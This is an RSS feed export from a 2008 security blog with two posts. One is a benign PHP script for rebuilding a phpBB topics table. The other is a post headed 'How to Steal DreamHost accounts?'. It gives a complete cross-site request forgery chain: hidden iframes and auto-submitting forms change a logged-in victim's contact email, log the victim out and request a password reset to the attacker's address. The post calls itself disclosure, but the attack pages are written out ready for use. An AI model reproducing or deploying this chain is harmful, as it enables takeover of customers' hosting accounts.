<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/rss2full.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/itemcontent.css" type="text/css" media="screen"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">

<channel>
	<title>Security Related</title>
	
	<link>http://guymizrahi.com</link>
	<description>Guy Mizrahi about Security and Technology.</description>
	<pubDate>Wed, 20 Aug 2008 21:13:28 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/securityrelated" type="application/rss+xml" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">1749076</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://www.feedburner.com</feedburner:feedburnerHostname><item>
		<title>how to regenerate phpbb_topics</title>
		<link>http://guymizrahi.com/2008/08/20/how-to-regenerate-phpbb_topics/</link>
		<comments>http://guymizrahi.com/2008/08/20/how-to-regenerate-phpbb_topics/#comments</comments>
		<pubDate>Wed, 20 Aug 2008 21:13:28 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Tips and Tricks]]></category>

		<category><![CDATA[phpbb]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/08/20/how-to-regenerate-phpbb_topics/</guid>
		<description><![CDATA[if phpbb_topics table is corrupted and you need to regenerate it, you can use this script:
&#60;?php
//&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-//
// phpbb_topics    Bappear    //
//&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-//
include &#8220;config.php&#8221;;
$abc = mysql_connect($dbhost, $dbuser, $dbpasswd);
mysql_select_db($dbname);
$aaa = mysql_query(&#8221;SELECT &#8221; . $table_prefix . &#8220;posts.topic_id, &#8221; . $table_prefix . &#8220;posts.forum_id, &#8221; . $table_prefix . &#8220;posts.poster_id, &#8221; . $table_prefix . &#8220;posts.post_time, not ISNULL(&#8221; . $table_prefix . &#8220;vote_desc.topic_id) as vote_topic_id, (count(&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>if phpbb_topics table is corrupted and you need to regenerate it, you can use this script:</p>
<p>&lt;?php<br />
//&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-//<br />
// phpbb_topics    Bappear    //<br />
//&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-//<br />
include &#8220;config.php&#8221;;<br />
$abc = mysql_connect($dbhost, $dbuser, $dbpasswd);<br />
mysql_select_db($dbname);</p>
<p>$aaa = mysql_query(&#8221;SELECT &#8221; . $table_prefix . &#8220;posts.topic_id, &#8221; . $table_prefix . &#8220;posts.forum_id, &#8221; . $table_prefix . &#8220;posts.poster_id, &#8221; . $table_prefix . &#8220;posts.post_time, not ISNULL(&#8221; . $table_prefix . &#8220;vote_desc.topic_id) as vote_topic_id, (count(&#8221; . $table_prefix . &#8220;posts.post_id) - 1) as topic_replies, IF(ISNULL(&#8221; . $table_prefix . &#8220;posts_text.post_subject), &#8216;Generic Title&#8217;, &#8221; . $table_prefix . &#8220;posts_text.post_subject) as post_subject, &#8221; . $table_prefix . &#8220;posts_text.post_id as topic_first_post_id, max(&#8221; . $table_prefix . &#8220;posts_text.post_id) as topic_last_post_id FROM `&#8221; . $table_prefix . &#8220;posts` LEFT JOIN &#8221; . $table_prefix . &#8220;vote_desc ON &#8221; . $table_prefix . &#8220;posts.topic_id = &#8221; . $table_prefix . &#8220;vote_desc.topic_id LEFT JOIN &#8221; . $table_prefix . &#8220;posts_text ON &#8221; . $table_prefix . &#8220;posts.post_id = &#8221; . $table_prefix . &#8220;posts_text.post_id GROUP BY &#8221; . $table_prefix . &#8220;posts.topic_id;&#8221;, $abc);</p>
<p>while($data = mysql_fetch_array($aaa)) {</p>
<p>mysql_query(&#8221;INSERT INTO `&#8221; . $table_prefix . &#8220;topics` (`topic_id`, `forum_id`, `topic_title`, `topic_poster`, `topic_time`, `topic_views`, `topic_replies`, `topic_status`, `topic_vote`, `topic_type`, `topic_first_post_id`, `topic_last_post_id`, `topic_moved_id`) VALUES(&#8221; . $data['topic_id'] . &#8220;, &#8221; . $data['forum_id'] . &#8220;, &#8216;&#8221; . mysql_real_escape_string($data['post_subject']) . &#8220;&#8216;, &#8221; . $data['poster_id'] . &#8220;, &#8221; . $data['post_time'] . &#8220;, 0, &#8221; . $data['topic_replies'] . &#8220;, 0, &#8221; . $data['vote_topic_id'] . &#8220;, 0, &#8221; . $data['topic_first_post_id'] . &#8220;, &#8221; . $data['topic_last_post_id'] . &#8220;, 0);&#8221;);<br />
}</p>
<p>mysql_free_result($aaa);<br />
mysql_close($abc);<br />
?&gt;</p>
<p>this script was created by one of my forums member, Nachum.</p>
<p>Thanks - It was a real save.</p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/08/20/how-to-regenerate-phpbb_topics/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Steal DreamHost accounts?</title>
		<link>http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts/</link>
		<comments>http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts/#comments</comments>
		<pubDate>Sat, 14 Jun 2008 18:23:38 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts/</guid>
		<description><![CDATA[I thought a lot before posting this, but in the name of full disclosures..
This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.
It will work on any dreamhost costumer that logged in to his account (Note - you must use the [...]]]></description>
			<content:encoded><![CDATA[<p>I thought a lot before posting this, but in the name of full disclosures..</p>
<p>This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.</p>
<p>It will work on any dreamhost costumer that logged in to his account (Note - you must use the logout button and then it will not work on your account <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> ).</p>
<p>A legal notice - If you use this to hack into someone&#8217;s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..</p>
<p>A short manual - how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).</p>
<p>So - How?</p>
<p>It is done by sending a link to a page you need to create and host online.</p>
<p>There will be 4 web pages to do 3 stages of attack:</p>
<p>1. Automatic change of contact details in the dreamhost control panel from your mark&#8217;s details to something you can get access to (the most important is the e-mail address).</p>
<p>2. automatic logoff your mark from dreamhost&#8217;s control panel.</p>
<p>3. request a new password to the new e-mail from dreamhost.</p>
<p>The first page (lets call it start.php):</p>
<p class="csharpcode">
<pre class="alt"><span class="lnum">   1:  </span><span class="kwrd">&lt;</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 100%; height: 42px"><span class="lnum">   2:  </span><span class="kwrd">&lt;</span><span class="html">META</span> <span class="attr">content</span><span class="kwrd">="text/html; charset=iso-8859-8-i"</span> <span class="attr">http-equiv</span>=<span class="attr">Content-Type</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   3:  </span><span class="kwrd">&lt;</span><span class="html">a1</span><span class="kwrd">&gt;</span>This page can not be found<span class="kwrd">&lt;/</span><span class="html">a1</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 100%; height: 42px"><span class="lnum">   4:  </span><span class="kwrd">&lt;</span><span class="html">iframe</span> <span class="attr">height</span><span class="kwrd">="0.1%"</span> <span class="attr">width</span><span class="kwrd">="0.1%"</span> <span class="attr">src</span><span class="kwrd">="http://somedomain.com/info.php"</span> <span class="attr">scrolling</span><span class="kwrd">="no"</span> <span class="attr">frameborder</span><span class="kwrd">="0"</span><span class="kwrd">&gt;&lt;/</span><span class="html">iframe</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100%; height: 42px"><span class="lnum">   5:  </span><span class="kwrd">&lt;</span><span class="html">iframe</span> <span class="attr">height</span><span class="kwrd">="0.1%"</span> <span class="attr">width</span><span class="kwrd">="0.1%"</span> <span class="attr">src</span><span class="kwrd">="http://somedomain.com/info3.php"</span> <span class="attr">scrolling</span><span class="kwrd">="no"</span> <span class="attr">frameborder</span><span class="kwrd">="0"</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 100%; height: 17px"><span class="lnum">   6:  </span><span class="kwrd">&lt;/</span><span class="html">iframe</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   7:  </span><span class="kwrd">&lt;/</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<p>as you can see, this page is loading two iframes with 0.1% height and width so the mark can&#8217;t see it.</p>
<p>info.php:</p>
<p class="csharpcode">
<pre class="alt"><span class="lnum">   1:  </span><span class="kwrd">&lt;</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   2:  </span><span class="kwrd">&lt;</span><span class="html">body</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100%; height: 30px"><span class="lnum">   3:  </span><span class="kwrd">&lt;</span><span class="html">form</span> <span class="attr">method</span>=<span class="attr">post</span> <span class="attr">action</span><span class="kwrd">="https://panel.dreamhost.com/id/?"</span> <span class="attr">id</span><span class="kwrd">="2"</span> <span class="attr">name</span><span class="kwrd">="asd"</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   4:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">type</span>=<span class="attr">hidden</span> <span class="attr">name</span>=<span class="attr">tab</span> <span class="attr">value</span><span class="kwrd">="contact"</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   5:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">type</span>=<span class="attr">hidden</span> <span class="attr">name</span><span class="kwrd">="command"</span> <span class="attr">value</span><span class="kwrd">="submit_edit"</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   6:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span> <span class="attr">valign</span>=<span class="attr">top</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   7:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>Name:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   8:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">select</span> <span class="attr">name</span><span class="kwrd">="prefix"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   9:  </span>                <span class="kwrd">&lt;</span><span class="html">option</span> <span class="attr">value</span><span class="kwrd">=""</span><span class="kwrd">&gt;&lt;/</span><span class="html">option</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  10:  </span>                <span class="kwrd">&lt;/</span><span class="html">select</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100.19%; height: 30px"><span class="lnum">  11:  </span>                <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="first"</span> <span class="attr">value</span><span class="kwrd">="somename"</span> <span class="attr">size</span><span class="kwrd">="8"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  12:  </span>                <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="middle"</span> <span class="attr">size</span><span class="kwrd">="1"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100.19%; height: 30px"><span class="lnum">  13:  </span>                <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="last"</span> <span class="attr">value</span><span class="kwrd">="somefamily"</span> <span class="attr">size</span><span class="kwrd">="8"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  14:  </span>                <span class="kwrd">&lt;</span><span class="html">select</span> <span class="attr">name</span><span class="kwrd">="suffix"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  15:  </span>                <span class="kwrd">&lt;</span><span class="html">option</span> <span class="attr">value</span><span class="kwrd">=""</span><span class="kwrd">&gt;&lt;/</span><span class="html">option</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  16:  </span>                <span class="kwrd">&lt;/</span><span class="html">select</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  17:  </span>        <span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  18:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  19:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span> <span class="attr">valign</span>=<span class="attr">top</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  20:  </span></pre>
<pre class="alt"><span class="lnum">  21:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>Address:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 95.76%; height: 30px"><span class="lnum">  22:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="street1"</span> <span class="attr">value</span><span class="kwrd">="somestreet"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;</span><span class="html">br</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  23:  </span>                <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="street2"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;</span><span class="html">br</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 95.38%; height: 30px"><span class="lnum">  24:  </span>                <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="city"</span> <span class="attr">value</span><span class="kwrd">="somecity"</span>  <span class="attr">size</span>=<span class="attr">20</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span>, <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="state"</span> <span class="attr">size</span>=<span class="attr">2</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;</span> <span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="zip"</span> <span class="attr">value</span><span class="kwrd">="1324"</span> <span class="attr">size</span>=<span class="attr">8</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;</span><span class="html">br</span><span class="kwrd">&gt;&lt;</span><span class="html">select</span> <span class="attr">name</span><span class="kwrd">="country"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;</span><span class="html">option</span> <span class="attr">value</span><span class="kwrd">="US"</span><span class="kwrd">&gt;</span>United States<span class="kwrd">&lt;/</span><span class="html">option</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  25:  </span><span class="kwrd">&lt;/</span><span class="html">select</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  26:  </span>        <span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  27:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  28:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span> <span class="attr">valign</span>=<span class="attr">top</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  29:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>Email:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 95.38%; height: 30px"><span class="lnum">  30:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="email"</span> <span class="attr">value</span><span class="kwrd">="somemail@somedomain.com"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  31:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  32:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  33:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>Phone:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 95.38%; height: 30px"><span class="lnum">  34:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="phone"</span> <span class="attr">value</span><span class="kwrd">="+123.45.6789123"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  35:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  36:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  37:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>Fax:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;</span>*<span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  38:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="fax"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  39:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  40:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  41:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>IM:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;</span>*<span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  42:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="chat"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  43:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  44:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  45:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span> <span class="attr">align</span>=<span class="attr">right</span><span class="kwrd">&gt;&lt;</span><span class="html">b</span><span class="kwrd">&gt;</span>URL:<span class="kwrd">&lt;/</span><span class="html">b</span><span class="kwrd">&gt;</span>*<span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  46:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="url"</span> <span class="attr">size</span>=<span class="attr">30</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  47:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  48:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  49:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  50:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">id</span>=<span class="attr">txt</span><span class="kwrd">&gt;</span>*optional information<span class="kwrd">&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  51:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  52:  </span>    <span class="kwrd">&lt;</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100.19%; height: 30px"><span class="lnum">  53:  </span>        <span class="kwrd">&lt;</span><span class="html">td</span> <span class="attr">colspan</span>=<span class="attr">2</span> <span class="attr">align</span>=<span class="attr">center</span> <span class="attr">id</span>=<span class="attr">txt</span><span class="kwrd">&gt;&lt;</span><span class="html">input</span> <span class="attr">type</span>=<span class="attr">submit</span> <span class="attr">value</span><span class="kwrd">="Submit New Contact Info"</span> <span class="attr">id</span>=<span class="attr">frm</span><span class="kwrd">&gt;&lt;</span><span class="html">br</span><span class="kwrd">&gt;</span>or<span class="kwrd">&lt;</span><span class="html">br</span><span class="kwrd">&gt;&lt;/</span><span class="html">td</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  54:  </span>    <span class="kwrd">&lt;/</span><span class="html">tr</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  55:  </span><span class="kwrd">&lt;/</span><span class="html">form</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  56:  </span><span class="kwrd">&lt;</span><span class="html">script</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  57:  </span>document.asd.submit();</pre>
<pre><span class="lnum">  58:  </span><span class="kwrd">&lt;/</span><span class="html">script</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100%; height: 30px"><span class="lnum">  59:  </span><span class="kwrd">&lt;</span><span class="html">iframe</span> <span class="attr">height</span><span class="kwrd">="0.1%"</span> <span class="attr">width</span><span class="kwrd">="0.1%"</span> <span class="attr">src</span><span class="kwrd">="http://somedomain.com/info3.php"</span> <span class="attr">scrolling</span><span class="kwrd">="no"</span> <span class="attr">frameborder</span><span class="kwrd">="0"</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">  60:  </span><span class="kwrd">&lt;/</span><span class="html">body</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">  61:  </span><span class="kwrd">&lt;</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<p>as you can see - this page will change the mark&#8217;s dreamhost control panel details to whatever you want and then redirect to info3.php</p>
<p>info3.php:</p>
<p class="csharpcode">
<pre class="alt"><span class="lnum">   1:  </span><span class="kwrd">&lt;</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 99.55%; height: 30px"><span class="lnum">   2:  </span><span class="kwrd">&lt;</span><span class="html">iframe</span> <span class="attr">height</span><span class="kwrd">="0.1%"</span> <span class="attr">width</span><span class="kwrd">="0.1%"</span> <span class="attr">src</span><span class="kwrd">="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout"</span> <span class="attr">scrolling</span><span class="kwrd">="no"</span> <span class="attr">frameborder</span><span class="kwrd">="0"</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   3:  </span><span class="kwrd">&lt;/</span><span class="html">iframe</span><span class="kwrd">&gt;</span></pre>
<pre style="width: 99.38%; height: 30px"><span class="lnum">   4:  </span><span class="kwrd">&lt;</span><span class="html">iframe</span> <span class="attr">height</span><span class="kwrd">="0.1%"</span> <span class="attr">width</span><span class="kwrd">="0.1%"</span> <span class="attr">src</span><span class="kwrd">="http://somedomain.com/info2.html"</span> <span class="attr">scrolling</span><span class="kwrd">="no"</span> <span class="attr">frameborder</span><span class="kwrd">="0"</span><span class="kwrd">&gt;&lt;/</span><span class="html">iframe</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   5:  </span><span class="kwrd">&lt;/</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<style type="text/css"> .csharpcode, .csharpcode pre { 	font-size: small; 	color: black; 	font-family: consolas, "Courier New", courier, monospace; 	background-color: #ffffff; 	/*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt  { 	background-color: #f4f4f4; 	width: 100%; 	margin: 0em; } .csharpcode .lnum { color: #606060; }</style>
<p>as you can see - info3.php is doing two things:</p>
<p>1. logoff  your mark from dreamhost control panel</p>
<p>2. redirect to info2.html</p>
<p>info2.html:</p>
<p class="csharpcode">
<pre class="alt"><span class="lnum">   1:  </span><span class="kwrd">&lt;</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   2:  </span><span class="kwrd">&lt;</span><span class="html">body</span> <span class="attr">onload</span><span class="kwrd">="document.getElementById('2').submit()"</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100.19%; height: 30px"><span class="lnum">   3:  </span><span class="kwrd">&lt;</span><span class="html">form</span> <span class="attr">method</span><span class="kwrd">="post"</span> <span class="attr">class</span><span class="kwrd">="fancyform"</span> <span class="attr">action</span><span class="kwrd">="https://panel.dreamhost.com/login/forgot.cgi"</span> <span class="attr">id</span><span class="kwrd">="2"</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   4:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">type</span><span class="kwrd">="hidden"</span> <span class="attr">name</span><span class="kwrd">="return_url"</span> <span class="attr">value</span><span class="kwrd">=""</span> <span class="kwrd">/&gt;</span></pre>
<pre class="alt"><span class="lnum">   5:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">type</span><span class="kwrd">="hidden"</span> <span class="attr">name</span><span class="kwrd">="email_pwd_submitted"</span> <span class="attr">value</span><span class="kwrd">="1"</span> <span class="kwrd">/&gt;</span></pre>
<pre style="width: 95%; height: 30px"><span class="lnum">   6:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">name</span><span class="kwrd">="email"</span> <span class="attr">class</span><span class="kwrd">="text"</span> <span class="attr">value</span><span class="kwrd">="somemail@somedomain.com"</span><span class="kwrd">&gt;</span></pre>
<pre class="alt" style="width: 100%; height: 30px"><span class="lnum">   7:  </span><span class="kwrd">&lt;</span><span class="html">input</span> <span class="attr">type</span><span class="kwrd">="submit"</span> <span class="attr">class</span><span class="kwrd">="button"</span> <span class="attr">value</span><span class="kwrd">="Email me my password!"</span><span class="kwrd">&gt;</span></pre>
<pre><span class="lnum">   8:  </span><span class="kwrd">&lt;/</span><span class="html">form</span><span class="kwrd">&gt;</span></pre>
<pre class="alt"><span class="lnum">   9:  </span><span class="kwrd">&lt;/</span><span class="html">body</span><span class="kwrd">&gt;</span></pre>
